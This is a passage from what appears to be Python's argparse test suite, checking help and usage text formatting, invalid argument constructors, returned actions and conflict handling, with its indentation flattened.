finally:
setattr(sys, self.std_name, old_stream)
self._test(tester, parser_text)
def test_print_file(self, tester):
parser = self._get_parser(tester)
print_ = getattr(parser, 'print_%s' % self.func_suffix)
sfile = StdIOBuffer()
print_(sfile)
parser_text = sfile.getvalue()
self._test(tester, parser_text)
# add tests for {format,print}_{usage,help,version}
for func_suffix, std_name in [('usage', 'stdout'),
('help', 'stdout'),
('version', 'stderr')]:
AddTests(cls, func_suffix, std_name)
bases = TestCase,
HelpTestCase = TestHelpFormattingMetaclass('HelpTestCase', bases, {})
class TestHelpBiggerOptionals(HelpTestCase):
"""Make sure that argument help aligns when options are longer"""
parser_signature = Sig(prog='PROG', description='DESCRIPTION',
epilog='EPILOG', version='0.1')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('foo', help='FOO HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-v] [-x] [--y Y] foo bar
'''
help = usage + '''\
DESCRIPTION
positional arguments:
foo FOO HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x X HELP
--y Y Y HELP
EPILOG
'''
version = '''\
0.1
'''
class TestHelpBiggerOptionalGroups(HelpTestCase):
"""Make sure that argument help aligns when options are longer"""
parser_signature = Sig(prog='PROG', description='DESCRIPTION',
epilog='EPILOG', version='0.1')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('foo', help='FOO HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = [
(Sig('GROUP TITLE', description='GROUP DESCRIPTION'), [
Sig('baz', help='BAZ HELP'),
Sig('-z', nargs='+', help='Z HELP')]),
]
usage = '''\
usage: PROG [-h] [-v] [-x] [--y Y] [-z Z [Z ...]] foo bar baz
'''
help = usage + '''\
DESCRIPTION
positional arguments:
foo FOO HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x X HELP
--y Y Y HELP
GROUP TITLE:
GROUP DESCRIPTION
baz BAZ HELP
-z Z [Z ...] Z HELP
EPILOG
'''
version = '''\
0.1
'''
class TestHelpBiggerPositionals(HelpTestCase):
"""Make sure that help aligns when arguments are longer"""
parser_signature = Sig(usage='USAGE', description='DESCRIPTION')
argument_signatures = [
Sig('-x', action='store_true', help='X HELP'),
Sig('--y', help='Y HELP'),
Sig('ekiekiekifekang', help='EKI HELP'),
Sig('bar', help='BAR HELP'),
]
argument_group_signatures = []
usage = '''\
usage: USAGE
'''
help = usage + '''\
DESCRIPTION
positional arguments:
ekiekiekifekang EKI HELP
bar BAR HELP
optional arguments:
-h, --help show this help message and exit
-x X HELP
--y Y Y HELP
'''
version = ''
class TestHelpReformatting(HelpTestCase):
"""Make sure that text after short names starts on the first line"""
parser_signature = Sig(
prog='PROG',
description=' oddly formatted\n'
'description\n'
'\n'
'that is so long that it should go onto multiple '
'lines when wrapped')
argument_signatures = [
Sig('-x', metavar='XX', help='oddly\n'
' formatted -x help'),
Sig('y', metavar='yyy', help='normal y help'),
]
argument_group_signatures = [
(Sig('title', description='\n'
' oddly formatted group\n'
'\n'
'description'),
[Sig('-a', action='store_true',
help=' oddly \n'
'formatted -a help \n'
' again, so long that it should be wrapped over '
'multiple lines')]),
]
usage = '''\
usage: PROG [-h] [-x XX] [-a] yyy
'''
help = usage + '''\
oddly formatted description that is so long that it should go onto \
multiple
lines when wrapped
positional arguments:
yyy normal y help
optional arguments:
-h, --help show this help message and exit
-x XX oddly formatted -x help
title:
oddly formatted group description
-a oddly formatted -a help again, so long that it should \
be wrapped
over multiple lines
'''
version = ''
class TestHelpWrappingShortNames(HelpTestCase):
"""Make sure that text after short names starts on the first line"""
parser_signature = Sig(prog='PROG', description= 'D\nD' * 30)
argument_signatures = [
Sig('-x', metavar='XX', help='XHH HX' * 20),
Sig('y', metavar='yyy', help='YH YH' * 20),
]
argument_group_signatures = [
(Sig('ALPHAS'), [
Sig('-a', action='store_true', help='AHHH HHA' * 10)]),
]
usage = '''\
usage: PROG [-h] [-x XX] [-a] yyy
'''
help = usage + '''\
D DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD \
DD DD DD
DD DD DD DD D
positional arguments:
yyy YH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH \
YHYH YHYH
YHYH YHYH YHYH YHYH YHYH YHYH YHYH YH
optional arguments:
-h, --help show this help message and exit
-x XX XHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH \
HXXHH HXXHH
HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HXXHH HX
ALPHAS:
-a AHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH HHAAHHH \
HHAAHHH
HHAAHHH HHAAHHH HHA
'''
version = ''
class TestHelpWrappingLongNames(HelpTestCase):
"""Make sure that text after long names starts on the next line"""
parser_signature = Sig(usage='USAGE', description= 'D D' * 30,
version='V V'*30)
argument_signatures = [
Sig('-x', metavar='X' * 25, help='XH XH' * 20),
Sig('y', metavar='y' * 25, help='YH YH' * 20),
]
argument_group_signatures = [
(Sig('ALPHAS'), [
Sig('-a', metavar='A' * 25, help='AH AH' * 20),
Sig('z', metavar='z' * 25, help='ZH ZH' * 20)]),
]
usage = '''\
usage: USAGE
'''
help = usage + '''\
D DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD DD \
DD DD DD
DD DD DD DD D
positional arguments:
yyyyyyyyyyyyyyyyyyyyyyyyy
YH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH \
YHYH YHYH
YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YHYH YH
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
XH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH \
XHXH XHXH
XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XHXH XH
ALPHAS:
-a AAAAAAAAAAAAAAAAAAAAAAAAA
AH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH \
AHAH AHAH
AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AHAH AH
zzzzzzzzzzzzzzzzzzzzzzzzz
ZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH \
ZHZH ZHZH
ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZHZH ZH
'''
version = '''\
V VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV \
VV VV VV
VV VV VV VV V
'''
class TestHelpUsage(HelpTestCase):
"""Test basic usage messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', nargs='+', help='w'),
Sig('-x', nargs='*', help='x'),
Sig('a', help='a'),
Sig('b', help='b', nargs=2),
Sig('c', help='c', nargs='?'),
]
argument_group_signatures = [
(Sig('group'), [
Sig('-y', nargs='?', help='y'),
Sig('-z', nargs=3, help='z'),
Sig('d', help='d', nargs='*'),
Sig('e', help='e', nargs='+'),
])
]
usage = '''\
usage: PROG [-h] [-w W [W ...]] [-x [X [X ...]]] [-y [Y]] [-z Z Z Z]
a b b [c] [d [d ...]] e [e ...]
'''
help = usage + '''\
positional arguments:
a a
b b
c c
optional arguments:
-h, --help show this help message and exit
-w W [W ...] w
-x [X [X ...]] x
group:
-y [Y] y
-z Z Z Z z
d d
e e
'''
version = ''
class TestHelpOnlyUserGroups(HelpTestCase):
"""Test basic usage messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = []
argument_group_signatures = [
(Sig('xxxx'), [
Sig('-x', help='x'),
Sig('a', help='a'),
]),
(Sig('yyyy'), [
Sig('b', help='b'),
Sig('-y', help='y'),
]),
]
usage = '''\
usage: PROG [-x X] [-y Y] a b
'''
help = usage + '''\
xxxx:
-x X x
a a
yyyy:
b b
-y Y y
'''
version = ''
class TestHelpUsageLongProg(HelpTestCase):
"""Test usage messages where the prog is long"""
parser_signature = Sig(prog='P' * 60)
argument_signatures = [
Sig('-w', metavar='W'),
Sig('-x', metavar='X'),
Sig('a'),
Sig('b'),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
[-h] [-w W] [-x X] a b
'''
help = usage + '''\
positional arguments:
a
b
optional arguments:
-h, --help show this help message and exit
-w W
-x X
'''
version = ''
class TestHelpUsageLongProgOptionsWrap(HelpTestCase):
"""Test usage messages where the prog is long and the optionals wrap"""
parser_signature = Sig(prog='P' * 60)
argument_signatures = [
Sig('-w', metavar='W' * 25),
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a'),
Sig('b'),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
[-h] [-w WWWWWWWWWWWWWWWWWWWWWWWWW] \
[-x XXXXXXXXXXXXXXXXXXXXXXXXX]
[-y YYYYYYYYYYYYYYYYYYYYYYYYY] [-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
a b
'''
help = usage + '''\
positional arguments:
a
b
optional arguments:
-h, --help show this help message and exit
-w WWWWWWWWWWWWWWWWWWWWWWWWW
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsageLongProgPositionalsWrap(HelpTestCase):
"""Test usage messages where the prog is long and the positionals wrap"""
parser_signature = Sig(prog='P' * 60, add_help=False)
argument_signatures = [
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
version = ''
class TestHelpUsageOptionalsWrap(HelpTestCase):
"""Test usage messages where the optionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', metavar='W' * 25),
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a'),
Sig('b'),
Sig('c'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-w WWWWWWWWWWWWWWWWWWWWWWWWW] \
[-x XXXXXXXXXXXXXXXXXXXXXXXXX]
[-y YYYYYYYYYYYYYYYYYYYYYYYYY] \
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
a b c
'''
help = usage + '''\
positional arguments:
a
b
c
optional arguments:
-h, --help show this help message and exit
-w WWWWWWWWWWWWWWWWWWWWWWWWW
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsagePositionalsWrap(HelpTestCase):
"""Test usage messages where the positionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x'),
Sig('-y'),
Sig('-z'),
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x X] [-y Y] [-z Z]
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
optional arguments:
-h, --help show this help message and exit
-x X
-y Y
-z Z
'''
version = ''
class TestHelpUsageOptionalsPositionalsWrap(HelpTestCase):
"""Test usage messages where the optionals and positionals wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x XXXXXXXXXXXXXXXXXXXXXXXXX] \
[-y YYYYYYYYYYYYYYYYYYYYYYYYY]
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
optional arguments:
-h, --help show this help message and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsageOptionalsOnlyWrap(HelpTestCase):
"""Test usage messages where there are only optionals and they wrap"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', metavar='X' * 25),
Sig('-y', metavar='Y' * 25),
Sig('-z', metavar='Z' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-x XXXXXXXXXXXXXXXXXXXXXXXXX] \
[-y YYYYYYYYYYYYYYYYYYYYYYYYY]
[-z ZZZZZZZZZZZZZZZZZZZZZZZZZ]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
-x XXXXXXXXXXXXXXXXXXXXXXXXX
-y YYYYYYYYYYYYYYYYYYYYYYYYY
-z ZZZZZZZZZZZZZZZZZZZZZZZZZ
'''
version = ''
class TestHelpUsagePositionalsOnlyWrap(HelpTestCase):
"""Test usage messages where there are only positionals and they wrap"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('a' * 25),
Sig('b' * 25),
Sig('c' * 25),
]
argument_group_signatures = []
usage = '''\
usage: PROG aaaaaaaaaaaaaaaaaaaaaaaaa bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
help = usage + '''\
positional arguments:
aaaaaaaaaaaaaaaaaaaaaaaaa
bbbbbbbbbbbbbbbbbbbbbbbbb
ccccccccccccccccccccccccc
'''
version = ''
class TestHelpVariableExpansion(HelpTestCase):
"""Test that variables are expanded properly in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-x', type=int,
help='x %(prog)s %(default)s %(type)s %%'),
Sig('-y', action='store_const', default=42, const='XXX',
help='y %(prog)s %(default)s %(const)s'),
Sig('--foo', choices='abc',
help='foo %(prog)s %(default)s %(choices)s'),
Sig('--bar', default='baz', choices=[1, 2], metavar='BBB',
help='bar %(prog)s %(default)s %(dest)s'),
Sig('spam', help='spam %(prog)s %(default)s'),
Sig('badger', default=0.5, help='badger %(prog)s %(default)s'),
]
argument_group_signatures = [
(Sig('group'), [
Sig('-a', help='a %(prog)s %(default)s'),
Sig('-b', default=-1, help='b %(prog)s %(default)s'),
])
]
usage = ('''\
usage: PROG [-h] [-x X] [-y] [--foo {a,b,c}] [--bar BBB] [-a A] [-b B]
spam badger
''')
help = usage + '''\
positional arguments:
spam spam PROG None
badger badger PROG 0.5
optional arguments:
-h, --help show this help message and exit
-x X x PROG None int %
-y y PROG 42 XXX
--foo {a,b,c} foo PROG None a, b, c
--bar BBB bar PROG baz bar
group:
-a A a PROG None
-b B b PROG -1
'''
version = ''
class TestHelpVariableExpansionUsageSupplied(HelpTestCase):
"""Test that variables are expanded properly when usage= is present"""
parser_signature = Sig(prog='PROG', usage='%(prog)s FOO')
argument_signatures = []
argument_group_signatures = []
usage = ('''\
usage: PROG FOO
''')
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
'''
version = ''
class TestHelpVariableExpansionNoArguments(HelpTestCase):
"""Test that variables are expanded properly with no arguments"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = []
argument_group_signatures = []
usage = ('''\
usage: PROG
''')
help = usage
version = ''
class TestHelpSuppressUsage(HelpTestCase):
"""Test that items can be suppressed in usage messages"""
parser_signature = Sig(prog='PROG', usage=argparse.SUPPRESS)
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
help = '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
usage = ''
version = ''
class TestHelpSuppressOptional(HelpTestCase):
"""Test that optional arguments can be suppressed in help messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('--foo', help=argparse.SUPPRESS),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG spam
'''
help = usage + '''\
positional arguments:
spam spam help
'''
version = ''
class TestHelpSuppressOptionalGroup(HelpTestCase):
"""Test that optional groups can be suppressed in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('group'), [Sig('--bar', help=argparse.SUPPRESS)]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpSuppressPositional(HelpTestCase):
"""Test that positional arguments can be suppressed in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help=argparse.SUPPRESS),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [--foo FOO]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpRequiredOptional(HelpTestCase):
"""Test that required options don't look optional"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', required=True, help='foo help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] --foo FOO
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpAlternatePrefixChars(HelpTestCase):
"""Test that options display with different prefix characters"""
parser_signature = Sig(prog='PROG', prefix_chars='^;', add_help=False)
argument_signatures = [
Sig('^^foo', action='store_true', help='foo help'),
Sig(';b', ';;bar', help='bar help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [^^foo] [;b BAR]
'''
help = usage + '''\
optional arguments:
^^foo foo help
;b BAR, ;;bar BAR bar help
'''
version = ''
class TestHelpNoHelpOptional(HelpTestCase):
"""Test that the --help argument can be suppressed help messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
--foo FOO foo help
'''
version = ''
class TestHelpVersionOptional(HelpTestCase):
"""Test that the --version argument can be suppressed help messages"""
parser_signature = Sig(prog='PROG', version='1.0')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-v] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--foo FOO foo help
'''
version = '''\
1.0
'''
class TestHelpNone(HelpTestCase):
"""Test that no errors occur if no help is specified"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo'),
Sig('spam'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam
optional arguments:
-h, --help show this help message and exit
--foo FOO
'''
version = ''
class TestHelpTupleMetavar(HelpTestCase):
"""Test specifying metavar as a tuple"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', help='w', nargs='+', metavar=('W1', 'W2')),
Sig('-x', help='x', nargs='*', metavar=('X1', 'X2')),
Sig('-y', help='y', nargs=3, metavar=('Y1', 'Y2', 'Y3')),
Sig('-z', help='z', nargs='?', metavar=('Z1', )),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-w W1 [W2 ...]] [-x [X1 [X2 ...]]] [-y Y1 Y2 Y3] \
[-z [Z1]]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
-w W1 [W2 ...] w
-x [X1 [X2 ...]] x
-y Y1 Y2 Y3 y
-z [Z1] z
'''
version = ''
class TestHelpRawText(HelpTestCase):
"""Test the RawTextHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.RawTextHelpFormatter,
description='Keep the formatting\n'
' exactly as it is written\n'
'\n'
'here\n')
argument_signatures = [
Sig('--foo', help=' foo help should also\n'
'appear as given here'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('title', description=' This text\n'
' should be indented\n'
' exactly like it is here\n'),
[Sig('--bar', help='bar help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar BAR] spam
'''
help = usage + '''\
Keep the formatting
exactly as it is written
here
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help should also
appear as given here
title:
This text
should be indented
exactly like it is here
--bar BAR bar help
'''
version = ''
class TestHelpRawDescription(HelpTestCase):
"""Test the RawTextHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.RawDescriptionHelpFormatter,
description='Keep the formatting\n'
' exactly as it is written\n'
'\n'
'here\n')
argument_signatures = [
Sig('--foo', help=' foo help should not\n'
' retain this odd formatting'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('title', description=' This text\n'
' should be indented\n'
' exactly like it is here\n'),
[Sig('--bar', help='bar help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar BAR] spam
'''
help = usage + '''\
Keep the formatting
exactly as it is written
here
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help should not retain this odd formatting
title:
This text
should be indented
exactly like it is here
--bar BAR bar help
'''
version = ''
class TestHelpArgumentDefaults(HelpTestCase):
"""Test the ArgumentDefaultsHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='description')
argument_signatures = [
Sig('--foo', help='foo help - oh and by the way, %(default)s'),
Sig('--bar', action='store_true', help='bar help'),
Sig('spam', help='spam help'),
Sig('badger', nargs='?', default='wooden', help='badger help'),
]
argument_group_signatures = [
(Sig('title', description='description'),
[Sig('--baz', type=int, default=42, help='baz help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar] [--baz BAZ] spam [badger]
'''
help = usage + '''\
description
positional arguments:
spam spam help
badger badger help (default: wooden)
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help - oh and by the way, None
--bar bar help (default: False)
title:
description
--baz BAZ baz help (default: 42)
'''
version = ''
class TestHelpVersionAction(HelpTestCase):
"""Test the default help for the version action"""
parser_signature = Sig(prog='PROG', description='description')
argument_signatures = [Sig('-V', '--version', action='version', version='3.6')]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-V]
'''
help = usage + '''\
description
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
'''
version = ''
class TestHelpSubparsersOrdering(HelpTestCase):
"""Test ordering of subcommands in help matches the code"""
parser_signature = Sig(prog='PROG',
description='display some subcommands',
version='0.1')
subparsers_signatures = [Sig(name=name)
for name in ('a', 'b', 'c', 'd', 'e')]
usage = '''\
usage: PROG [-h] [-v] {a,b,c,d,e} ...
'''
help = usage + '''\
display some subcommands
positional arguments:
{a,b,c,d,e}
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
'''
version = '''\
0.1
'''
class TestHelpSubparsersWithHelpOrdering(HelpTestCase):
"""Test ordering of subcommands in help matches the code"""
parser_signature = Sig(prog='PROG',
description='display some subcommands',
version='0.1')
subcommand_data = (('a', 'a subcommand help'),
('b', 'b subcommand help'),
('c', 'c subcommand help'),
('d', 'd subcommand help'),
('e', 'e subcommand help'),
)
subparsers_signatures = [Sig(name=name, help=help)
for name, help in subcommand_data]
usage = '''\
usage: PROG [-h] [-v] {a,b,c,d,e} ...
'''
help = usage + '''\
display some subcommands
positional arguments:
{a,b,c,d,e}
a a subcommand help
b b subcommand help
c c subcommand help
d d subcommand help
e e subcommand help
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
'''
version = '''\
0.1
'''
# =====================================
# Optional/Positional constructor tests
# =====================================
class TestInvalidArgumentConstructors(TestCase):
"""Test a bunch of invalid Argument constructors"""
def assertTypeError(self, *args, **kwargs):
parser = argparse.ArgumentParser()
self.assertRaises(TypeError, parser.add_argument,
*args, **kwargs)
def assertValueError(self, *args, **kwargs):
parser = argparse.ArgumentParser()
self.assertRaises(ValueError, parser.add_argument,
*args, **kwargs)
def test_invalid_keyword_arguments(self):
self.assertTypeError('-x', bar=None)
self.assertTypeError('-y', callback='foo')
self.assertTypeError('-y', callback_args=())
self.assertTypeError('-y', callback_kwargs={})
def test_missing_destination(self):
self.assertTypeError()
for action in ['append', 'store']:
self.assertTypeError(action=action)
def test_invalid_option_strings(self):
self.assertValueError('--')
self.assertValueError('---')
def test_invalid_type(self):
self.assertValueError('--foo', type='int')
self.assertValueError('--foo', type=(int, float))
def test_invalid_action(self):
self.assertValueError('-x', action='foo')
self.assertValueError('foo', action='baz')
self.assertValueError('--foo', action=('store', 'append'))
parser = argparse.ArgumentParser()
try:
parser.add_argument("--foo", action="store-true")
except ValueError:
e = sys.exc_info()[1]
expected = 'unknown action'
msg = 'expected %r, found %r' % (expected, e)
self.assertTrue(expected in str(e), msg)
def test_multiple_dest(self):
parser = argparse.ArgumentParser()
parser.add_argument(dest='foo')
try:
parser.add_argument('bar', dest='baz')
except ValueError:
e = sys.exc_info()[1]
expected = 'dest supplied twice for positional argument'
msg = 'expected %r, found %r' % (expected, e)
self.assertTrue(expected in str(e), msg)
def test_no_argument_actions(self):
for action in ['store_const', 'store_true', 'store_false',
'append_const', 'count']:
for attrs in [dict(type=int), dict(nargs='+'),
dict(choices='ab')]:
self.assertTypeError('-x', action=action, **attrs)
def test_no_argument_no_const_actions(self):
# options with zero arguments
for action in ['store_true', 'store_false', 'count']:
# const is always disallowed
self.assertTypeError('-x', const='foo', action=action)
# nargs is always disallowed
self.assertTypeError('-x', nargs='*', action=action)
def test_more_than_one_argument_actions(self):
for action in ['store', 'append']:
# nargs=0 is disallowed
self.assertValueError('-x', nargs=0, action=action)
self.assertValueError('spam', nargs=0, action=action)
# const is disallowed with non-optional arguments
for nargs in [1, '*', '+']:
self.assertValueError('-x', const='foo',
nargs=nargs, action=action)
self.assertValueError('spam', const='foo',
nargs=nargs, action=action)
def test_required_const_actions(self):
for action in ['store_const', 'append_const']:
# nargs is always disallowed
self.assertTypeError('-x', nargs='+', action=action)
def test_parsers_action_missing_params(self):
self.assertTypeError('command', action='parsers')
self.assertTypeError('command', action='parsers', prog='PROG')
self.assertTypeError('command', action='parsers',
parser_class=argparse.ArgumentParser)
def test_required_positional(self):
self.assertTypeError('foo', required=True)
def test_user_defined_action(self):
class Success(Exception):
pass
class Action(object):
def __init__(self,
option_strings,
dest,
const,
default,
required=False):
if dest == 'spam':
if const is Success:
if default is Success:
raise Success()
def __call__(self, *args, **kwargs):
pass
parser = argparse.ArgumentParser()
self.assertRaises(Success, parser.add_argument, '--spam',
action=Action, default=Success, const=Success)
self.assertRaises(Success, parser.add_argument, 'spam',
action=Action, default=Success, const=Success)
# ================================
# Actions returned by add_argument
# ================================
class TestActionsReturned(TestCase):
def test_dest(self):
parser = argparse.ArgumentParser()
action = parser.add_argument('--foo')
self.assertEqual(action.dest, 'foo')
action = parser.add_argument('-b', '--bar')
self.assertEqual(action.dest, 'bar')
action = parser.add_argument('-x', '-y')
self.assertEqual(action.dest, 'x')
def test_misc(self):
parser = argparse.ArgumentParser()
action = parser.add_argument('--foo', nargs='?', const=42,
default=84, type=int, choices=[1, 2],
help='FOO', metavar='BAR', dest='baz')
self.assertEqual(action.nargs, '?')
self.assertEqual(action.const, 42)
self.assertEqual(action.default, 84)
self.assertEqual(action.type, int)
self.assertEqual(action.choices, [1, 2])
self.assertEqual(action.help, 'FOO')
self.assertEqual(action.metavar, 'BAR')
self.assertEqual(action.dest, 'baz')
# ================================
# Argument conflict handling tests
# ================================
class TestConflictHandling(TestCase):
def test_bad_type(self):
self.assertRaises(ValueError, argparse.ArgumentParser,
conflict_handler='foo')
def test_conflict_error(self):
parser = argparse.ArgumentParser()
parser.add_argument('-x')
self.assertRaises(argparse.ArgumentError,
parser.add_argument, '-x')
parser.add_argument('--spam')
self.assertRaises(argparse.ArgumentError,
parser.add_argument, '--spam')
def test_resolve_error(self):
get_parser = argparse.ArgumentParser
parser = get_parser(prog='PROG', conflict_handler='resolve')
parser.add_argument('-x', help='OLD X')
parser.add_argument('-x', help='NEW X')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [-x X]
optional arguments:
-h, --help show this help message and exit
-x X NEW X
'''))
parser.add_argument('--spam', metavar='OLD_SPAM')
parser.add_argument('--spam', metavar='NEW_SPAM')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [-x X] [--spam NEW_SPAM]
optional arguments:
-h, --help show this help message and exit
-x X NEW X
--spam NEW_SPAM
'''))
# =============================
# Help and Version option tests
# =============================
